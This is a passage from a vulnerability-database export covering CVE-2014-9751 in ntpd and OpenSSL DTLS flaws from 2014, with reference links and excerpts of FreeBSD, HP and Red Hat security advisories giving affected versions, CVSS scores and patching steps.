"http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/72584" }, { "trust": 1.7, "url": "http://support.ntp.org/bin/view/main/securitynotice#december_2014_ntp_security_vulne" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1184572" }, { "trust": 1.7, "url": "http://www.debian.org/security/2015/dsa-3388" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2015-1459.html" }, { "trust": 1.7, "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03886en_us" }, { "trust": 1.6, "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2" }, { "trust": 0.8, "url": "http://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm" }, { "trust": 0.8, "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01" }, { "trust": 0.8, "url": "https://support.apple.com/en-us/ht6601" }, { "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "trust": 0.8, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9751" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu96605606/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9751" }, { "trust": 0.3, "url": "http://ntp.org/" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1022814" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098944" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1005137" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21972266" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21974652" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699578" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp4_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022657" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097484" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966274" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962463" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020857" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903233" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21975967" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9751" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2231" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.debian.org/security/./dsa-3154" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3405" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9750" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2231.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9298" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-1798" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1799" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1798" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9298" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5219" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5300" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5146" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5195" }, { "trust": 0.1, "url": "https://www.debian.org/security/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9751" }, { "db": "BID", "id": "72584" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "NVD", "id": "CVE-2014-9751" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9751" }, { "db": "BID", "id": "72584" }, { "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "db": "PACKETSTORM", "id": "134448" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "NVD", "id": "CVE-2014-9751" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-19T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2015-10-06T00:00:00", "db": "VULMON", "id": "CVE-2014-9751" }, { "date": "2015-02-04T00:00:00", "db": "BID", "id": "72584" }, { "date": "2015-10-07T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "date": "2015-11-20T00:42:01", "db": "PACKETSTORM", "id": "134448" }, { "date": "2015-11-02T16:48:39", "db": "PACKETSTORM", "id": "134162" }, { "date": "2015-10-06T01:59:02.610000", "db": "NVD", "id": "CVE-2014-9751" }, { "date": "2015-10-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-27T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2021-09-08T00:00:00", "db": "VULMON", "id": "CVE-2014-9751" }, { "date": "2016-07-11T20:00:00", "db": "BID", "id": "72584" }, { "date": "2016-11-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-008139" }, { "date": "2021-09-08T17:19:31.060000", "db": "NVD", "id": "CVE-2014-9751" }, { "date": "2020-06-19T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-027" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201510-027" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)", "sources": [ { "db": "CERT/CC", "id": "VU#852879" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Input Validation Error", "sources": [ { "db": "BID", "id": "72584" }, { "db": "CNNVD", "id": "CNNVD-201510-027" } ], "trust": 0.9 } }
var-201408-0089
Vulnerability from variot
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function. OpenSSL is prone to a denial-of-service vulnerability. Attackers may exploit this issue to cause a memory leak, resulting in a denial-of-service condition. The following versions are vulnerable: OpenSSL 0.9.8 versions prior to 0.9.8zb. OpenSSL 1.0.0 versions prior to 1.0.0n. OpenSSL 1.0.1 versions prior to 1.0.1i. - The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information. Corrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE) 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8) 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE) 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1) 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11) 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18) 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE) 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15) CVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510, CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
FreeBSD includes software from the OpenSSL Project.
II. [CVE-2014-5139]
III. Additionally, a remote attacker may be able to run arbitrary code on a vulnerable system if the application has been set up for SRP.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.0]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 9.3]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 9.2, 9.1, 8.4]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
3) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r269687 releng/8.4/ r271305 stable/9/ r269687 releng/9.1/ r271305 releng/9.2/ r271305 releng/9.3/ r271305 stable/10/ r269686 releng/10.0/ r271304
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII.
Detailed descriptions of the vulnerabilities can be found at: https://www.openssl.org/news/secadv_20140806.txt
It's important that you upgrade the libssl1.0.0 package and not just the openssl package. Alternatively, you may reboot your system.
For the testing distribution (jessie), these problems will be fixed soon. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04426586
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04426586 Version: 1
HPSBOV03099 rev.1 - HP OpenVMS running OpenSSL, Remote Denial of Service (DoS) or Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-09-12 Last Updated: 2014-09-12
Potential Security Impact: Remote Denial of Service (DoS), disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OpenVMS running OpenSSL.
References:
CVE-2014-3505 - Remote Denial of Service (DoS) CVE-2014-3506 - Remote Denial of Service (DoS) CVE-2014-3507 - Remote Denial of Service (DoS) CVE-2014-3508 - Remote Disclosure of Information CVE-2014-3510 - Remote Denial of Service (DoS)
SSRT101686
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP SSL Version 1.4-476 and earlier for OpenVMS
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software update available to resolve the vulnerabilities with HP OpenVMS running OpenSSL.
HP SSL Version 1.4-493 for OpenVMS is available from the following
location:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
HISTORY Version:1 (rev.1) - 12 September 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2014:1052-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1052.html Issue date: 2014-08-13 CVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3507 CVE-2014-3508 CVE-2014-3509 CVE-2014-3510 CVE-2014-3511 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
A race condition was found in the way OpenSSL handled ServerHello messages with an included Supported EC Point Format extension. A malicious server could possibly use this flaw to cause a multi-threaded TLS/SSL client using OpenSSL to write into freed memory, causing the client to crash or execute arbitrary code. (CVE-2014-3509)
It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory. (CVE-2014-3508)
A flaw was found in the way OpenSSL handled fragmented handshake packets. A man-in-the-middle attacker could use this flaw to force a TLS/SSL server using OpenSSL to use TLS 1.0, even if both the client and the server supported newer protocol versions. (CVE-2014-3511)
Multiple flaws were discovered in the way OpenSSL handled DTLS packets. A remote attacker could use these flaws to cause a DTLS server or client using OpenSSL to crash or use excessive amounts of memory. (CVE-2014-3505, CVE-2014-3506, CVE-2014-3507)
A NULL pointer dereference flaw was found in the way OpenSSL performed a handshake when using the anonymous Diffie-Hellman (DH) key exchange. A malicious server could cause a DTLS client using OpenSSL to crash if that client had anonymous DH cipher suites enabled. (CVE-2014-3510)
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm
ppc64: openssl-1.0.1e-16.el6_5.15.ppc.rpm openssl-1.0.1e-16.el6_5.15.ppc64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.ppc.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm openssl-devel-1.0.1e-16.el6_5.15.ppc.rpm openssl-devel-1.0.1e-16.el6_5.15.ppc64.rpm
s390x: openssl-1.0.1e-16.el6_5.15.s390.rpm openssl-1.0.1e-16.el6_5.15.s390x.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.s390.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm openssl-devel-1.0.1e-16.el6_5.15.s390.rpm openssl-devel-1.0.1e-16.el6_5.15.s390x.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm openssl-perl-1.0.1e-16.el6_5.15.ppc64.rpm openssl-static-1.0.1e-16.el6_5.15.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm openssl-perl-1.0.1e-16.el6_5.15.s390x.rpm openssl-static-1.0.1e-16.el6_5.15.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.15.i686.rpm openssl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.15.i686.rpm openssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.15.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm openssl-perl-1.0.1e-16.el6_5.15.i686.rpm openssl-static-1.0.1e-16.el6_5.15.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm openssl-static-1.0.1e-16.el6_5.15.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-static-1.0.1e-34.el7_0.4.i686.rpm openssl-static-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.4.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.4.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.4.ppc.rpm openssl-devel-1.0.1e-34.el7_0.4.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.4.ppc.rpm openssl-libs-1.0.1e-34.el7_0.4.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.4.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.s390x.rpm openssl-devel-1.0.1e-34.el7_0.4.s390.rpm openssl-devel-1.0.1e-34.el7_0.4.s390x.rpm openssl-libs-1.0.1e-34.el7_0.4.s390.rpm openssl-libs-1.0.1e-34.el7_0.4.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.4.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.4.i686.rpm openssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.4.i686.rpm openssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
